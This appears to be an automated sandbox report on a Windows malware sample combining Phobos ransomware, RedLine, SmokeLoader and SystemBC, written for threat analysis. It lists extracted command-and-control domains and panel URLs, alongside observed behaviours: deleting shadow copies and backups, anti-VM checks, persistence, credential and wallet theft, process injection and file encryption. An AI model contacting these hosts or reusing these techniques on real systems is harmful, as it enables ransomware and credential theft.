phobos | 160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a

Analysis

max time kernel
123s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
25-06-2023 06:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

288KB
MD5

6ae917525435e23b07d15537fb40aea0
SHA1

7c85b447bb5608ba7fb6a332c033c0cdad0430ae
SHA256

160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a
SHA512

23e5f94e964d53d72af0d6ad31da309539116a9963806ce7b0d3c028a69ab343df6cd6f3989b280e70a285395425a1cb93492fe5030968558ada5f7de047aaed
SSDEEP

6144:Ft+WQdzUUPFTf2HHvKlHQho0jT21v3Ifz/x2ShelxPcWpv:61oqm+QbjTIwr/l00m

Score

10^/10

phobos redline smokeloader systembc 1 agilenet backdoor collection evasion infostealer persistence ransomware spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

dexstat255.xyz:46578

Attributes

auth_value
c4805fc19583231a4c5bb64b0e833716

Extracted

Family

systembc

adstat277xm.xyz:4044

demstat377xm.xyz:4044

Extracted

Family

smokeloader

Version

2022

http://serverlogs37.xyz/statweb255/

http://servblog757.xyz/statweb255/

http://dexblog45.xyz/statweb255/

http://admlogs.online/statweb255/

http://blogstat355.xyz/statweb255/

http://blogstatserv25.xyz/statweb255/

rc4.i32

Signatures

Phobos
Phobos ransomware appeared at the beginning of 2019.
ransomware phobos
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

547C.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 547C.exe
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4320 bcdedit.exe
372 bcdedit.exe
Renames multiple (371) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

24 2176 powershell.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

3488 wbadmin.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exe

pid process

1776 netsh.exe
1848 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	547C.exe

pid	process
4320	bcdedit.exe
372	bcdedit.exe

flow	pid	process
24	2176	powershell.exe

pid	process
3488	wbadmin.exe

pid	process
1776	netsh.exe
1848	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

547C.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	547C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	547C.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sv.bat.exe547C.exeSRD.bat.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation	sv.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation	547C.exe
Key value queried	\REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation	SRD.bat.exe

Drops startup file 1 IoCs

Processes:

3EBF.exe

description ioc process

File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\3EBF.exe 3EBF.exe

description	ioc	process
File created	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\3EBF.exe	3EBF.exe

Executes dropped EXE 11 IoCs

Processes:

ldx999sx.exes777mx.exeldx999sx.exe3C2E.exe3EBF.exe42D7.exe3EBF.exe547C.exe547C.exeSRD.bat.exesv.bat.exe

pid	process
1856	ldx999sx.exe
3420	s777mx.exe
3428	ldx999sx.exe
2992	3C2E.exe
3280	3EBF.exe
4152	42D7.exe
556	3EBF.exe
1424	547C.exe
3852	547C.exe
4112	SRD.bat.exe
2024	sv.bat.exe

Loads dropped DLL 1 IoCs

Processes:

547C.exe

pid process

1424 547C.exe

pid	process
1424	547C.exe

Obfuscated with Agile.Net obfuscator 4 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\547C.exe	agile_net
C:\Users\Admin\AppData\Local\Temp\547C.exe	agile_net
behavioral2/memory/1424-396-0x0000000000FF0000-0x000000000164E000-memory.dmp	agile_net
C:\Users\Admin\AppData\Local\Temp\547C.exe	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll	themida
C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll	themida
behavioral2/memory/1424-439-0x00000000707B0000-0x0000000070D90000-memory.dmp	themida

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

3C2E.exe3EBF.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe"	3C2E.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3EBF = "C:\\Users\\Admin\\AppData\\Local\\3EBF.exe"	3EBF.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3EBF = "C:\\Users\\Admin\\AppData\\Local\\3EBF.exe"	3EBF.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

547C.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 547C.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	547C.exe

Drops desktop.ini file(s) 4 IoCs

Processes:

3EBF.exe

description	ioc	process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini	3EBF.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini	3EBF.exe
File opened for modification	C:\Program Files\desktop.ini	3EBF.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	3EBF.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs

Processes:

powershell.exe

pid	process
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exeldx999sx.execmd.exe

description	pid	process	target process
PID 2176 set thread context of 4716	2176	powershell.exe	aspnet_compiler.exe
PID 1856 set thread context of 3428	1856	ldx999sx.exe	ldx999sx.exe
PID 1424 set thread context of 3852	1424	cmd.exe	547C.exe

Drops file in Program Files directory 64 IoCs

Processes:

3EBF.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_unselected_18.svg	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-ms.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-256.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutArchiveImage.layoutdir-LTR.gif	3EBF.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png	3EBF.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Square310x310Logo.scale-200.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteMedTile.scale-125.png	3EBF.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-922299981-3641064733-3870770889-1000-MergedResources-0.pri	3EBF.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js	3EBF.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\en-US.Calendar.ot	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7d5.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-30.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-80_altform-unplated_contrast-white.png	3EBF.exe
File created	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageProviderFunctions.psm1.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll	3EBF.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui	3EBF.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100_contrast-high.png	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\vfs\System\msvcr110.dll.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubMedTile.scale-200_contrast-black.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\ColorVertexShader.cso	3EBF.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js	3EBF.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\javap.exe	3EBF.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml	3EBF.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-pl.xrm-ms	3EBF.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.boot.tree.dat	3EBF.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WindowsBase.dll	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_LogoSmall.targetsize-16_altform-unplated.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-32_altform-unplated.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-72_altform-unplated.png	3EBF.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ul-oob.xrm-ms.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Spatial.NetFX35.dll	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\PREVIEW.GIF.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarBadge.scale-200.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubMedTile.scale-100_contrast-high.png	3EBF.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-pl.xrm-ms	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ccme_ecc.dll	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-16.png	3EBF.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-24_altform-lightunplated.png	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\casual.dotx.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_K_COL.HXK.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dll	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\personaspybridge.js.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Odata.dll.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\SignInControl.xaml	3EBF.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT.xml.id[CF072F13-3483].[[email protected]].8base	3EBF.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-oob.xrm-ms	3EBF.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	3EBF.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEODBCI.DLL	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FetchingMail-Dark.scale-150.png	3EBF.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsnor.xml	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionWideTile.scale-400.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-60.png	3EBF.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSmallTile.scale-100.png	3EBF.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1308 556 WerFault.exe 3EBF.exe
3344 4152 WerFault.exe 42D7.exe

pid	pid_target	process	target process
1308	556	WerFault.exe	3EBF.exe
3344	4152	WerFault.exe	42D7.exe

Checks SCSI registry key(s) 3 TTPs 7 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exeldx999sx.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ldx999sx.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ldx999sx.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ldx999sx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2860 vssadmin.exe

pid	process
2860	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe

pid	process
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe
2176	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3292
Suspicious behavior: MapViewOfSection 31 IoCs

Processes:

ldx999sx.exe

pid process

3428 ldx999sx.exe
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292

pid	process
3292

pid	process
3428	ldx999sx.exe
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292
3292

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeaspnet_compiler.exe3EBF.exevssvc.exe3C2E.exeWMIC.exewbengine.exe

description	pid	process
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeShutdownPrivilege	2176	powershell.exe
Token: SeCreatePagefilePrivilege	2176	powershell.exe
Token: SeDebugPrivilege	4716	aspnet_compiler.exe
Token: SeShutdownPrivilege	3292
Token: SeCreatePagefilePrivilege	3292
Token: SeShutdownPrivilege	3292
Token: SeCreatePagefilePrivilege	3292
Token: SeDebugPrivilege	3280	3EBF.exe
Token: SeBackupPrivilege	4908	vssvc.exe
Token: SeRestorePrivilege	4908	vssvc.exe
Token: SeAuditPrivilege	4908	vssvc.exe
Token: SeDebugPrivilege	2992	3C2E.exe
Token: SeShutdownPrivilege	3292
Token: SeCreatePagefilePrivilege	3292
Token: SeIncreaseQuotaPrivilege	2156	WMIC.exe
Token: SeSecurityPrivilege	2156	WMIC.exe
Token: SeTakeOwnershipPrivilege	2156	WMIC.exe
Token: SeLoadDriverPrivilege	2156	WMIC.exe
Token: SeSystemProfilePrivilege	2156	WMIC.exe
Token: SeSystemtimePrivilege	2156	WMIC.exe
Token: SeProfSingleProcessPrivilege	2156	WMIC.exe
Token: SeIncBasePriorityPrivilege	2156	WMIC.exe
Token: SeCreatePagefilePrivilege	2156	WMIC.exe
Token: SeBackupPrivilege	2156	WMIC.exe
Token: SeRestorePrivilege	2156	WMIC.exe
Token: SeShutdownPrivilege	2156	WMIC.exe
Token: SeDebugPrivilege	2156	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2156	WMIC.exe
Token: SeRemoteShutdownPrivilege	2156	WMIC.exe
Token: SeUndockPrivilege	2156	WMIC.exe
Token: SeManageVolumePrivilege	2156	WMIC.exe
Token: 33	2156	WMIC.exe
Token: 34	2156	WMIC.exe
Token: 35	2156	WMIC.exe
Token: 36	2156	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2156	WMIC.exe
Token: SeSecurityPrivilege	2156	WMIC.exe
Token: SeTakeOwnershipPrivilege	2156	WMIC.exe
Token: SeLoadDriverPrivilege	2156	WMIC.exe
Token: SeSystemProfilePrivilege	2156	WMIC.exe
Token: SeSystemtimePrivilege	2156	WMIC.exe
Token: SeProfSingleProcessPrivilege	2156	WMIC.exe
Token: SeIncBasePriorityPrivilege	2156	WMIC.exe
Token: SeCreatePagefilePrivilege	2156	WMIC.exe
Token: SeBackupPrivilege	2156	WMIC.exe
Token: SeRestorePrivilege	2156	WMIC.exe
Token: SeShutdownPrivilege	2156	WMIC.exe
Token: SeDebugPrivilege	2156	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2156	WMIC.exe
Token: SeRemoteShutdownPrivilege	2156	WMIC.exe
Token: SeUndockPrivilege	2156	WMIC.exe
Token: SeManageVolumePrivilege	2156	WMIC.exe
Token: 33	2156	WMIC.exe
Token: 34	2156	WMIC.exe
Token: 35	2156	WMIC.exe
Token: 36	2156	WMIC.exe
Token: SeBackupPrivilege	3928	wbengine.exe
Token: SeRestorePrivilege	3928	wbengine.exe
Token: SeSecurityPrivilege	3928	wbengine.exe
Token: SeShutdownPrivilege	3292
Token: SeCreatePagefilePrivilege	3292
Token: SeDebugPrivilege	2992	3C2E.exe
Token: SeShutdownPrivilege	3292

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exepowershell.exeaspnet_compiler.exeldx999sx.exe3EBF.execmd.execmd.exe

description	pid	process	target process
PID 2228 wrote to memory of 2176	2228	file.exe	powershell.exe
PID 2228 wrote to memory of 2176	2228	file.exe	powershell.exe
PID 2228 wrote to memory of 2176	2228	file.exe	powershell.exe
PID 2176 wrote to memory of 4716	2176	powershell.exe	aspnet_compiler.exe
PID 2176 wrote to memory of 4716	2176	powershell.exe	aspnet_compiler.exe
PID 2176 wrote to memory of 4716	2176	powershell.exe	aspnet_compiler.exe
PID 2176 wrote to memory of 4716	2176	powershell.exe	aspnet_compiler.exe
PID 2176 wrote to memory of 4716	2176	powershell.exe	aspnet_compiler.exe
PID 2176 wrote to memory of 4716	2176	powershell.exe	aspnet_compiler.exe
PID 2176 wrote to memory of 4716	2176	powershell.exe	aspnet_compiler.exe
PID 2176 wrote to memory of 4716	2176	powershell.exe	aspnet_compiler.exe
PID 4716 wrote to memory of 1856	4716	aspnet_compiler.exe	ldx999sx.exe
PID 4716 wrote to memory of 1856	4716	aspnet_compiler.exe	ldx999sx.exe
PID 4716 wrote to memory of 1856	4716	aspnet_compiler.exe	ldx999sx.exe
PID 4716 wrote to memory of 3420	4716	aspnet_compiler.exe	s777mx.exe
PID 4716 wrote to memory of 3420	4716	aspnet_compiler.exe	s777mx.exe
PID 4716 wrote to memory of 3420	4716	aspnet_compiler.exe	s777mx.exe
PID 1856 wrote to memory of 3428	1856	ldx999sx.exe	ldx999sx.exe
PID 1856 wrote to memory of 3428	1856	ldx999sx.exe	ldx999sx.exe
PID 1856 wrote to memory of 3428	1856	ldx999sx.exe	ldx999sx.exe
PID 1856 wrote to memory of 3428	1856	ldx999sx.exe	ldx999sx.exe
PID 1856 wrote to memory of 3428	1856	ldx999sx.exe	ldx999sx.exe
PID 1856 wrote to memory of 3428	1856	ldx999sx.exe	ldx999sx.exe
PID 3292 wrote to memory of 2992	3292		3C2E.exe
